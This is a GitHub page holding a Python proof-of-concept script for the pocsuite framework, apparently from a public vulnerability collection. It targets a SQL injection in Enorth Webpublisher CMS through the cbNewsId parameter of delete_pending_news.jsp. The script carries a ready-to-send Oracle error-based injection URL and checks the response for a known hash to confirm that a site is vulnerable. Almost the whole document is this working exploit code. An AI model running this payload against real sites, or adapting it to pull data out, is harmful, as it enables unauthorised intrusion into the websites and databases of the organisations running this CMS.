-
Notifications
You must be signed in to change notification settings - Fork 52
/
Copy pathEnorth Webpublisher CMS SQL Injection from delete_pending_news.jsp.py
executable file
·49 lines (38 loc) · 1.67 KB
/
Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python
# coding: utf-8
from urlparse import urljoin
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '89306' # vul ID
version = '1'
author = ['cnyql']
vulDate = '2015-09-02'
createDate = '2015-09-02'
updateDate = '2015-09-12'
references = ['http://www.sebug.net/vuldb/ssvid-89306']
name = 'Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp'
appPowerLink = 'http://webpublisher.enorth.com.cn/'
appName = 'Enorth Webpublisher CMS'
appVersion = 'unknown'
vulType = 'SQL Injection'
desc = '''
Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users.
'''
def _verify(self):
payload = "pub/m_pending_news/delete_pending_news.jsp?cbNewsId=1)%20and%201=ctxsys.drithsx.sn(1,(Utl_Raw.Cast_To_Raw(sys.dbms_obfuscation_toolkit.md5(input_string => '3.14'))))?"
# ORACLE ERROR BASED INJ
res = req.get(urljoin(self.url, payload), timeout=5)
return self.parse_verify(res, payload)
def parse_verify(self, res, payload):
output = Output(self)
result = {}
if '4beed3b9c4a886067de0e3a094246f78' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urljoin(self.url, payload)
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
register(TestPOC)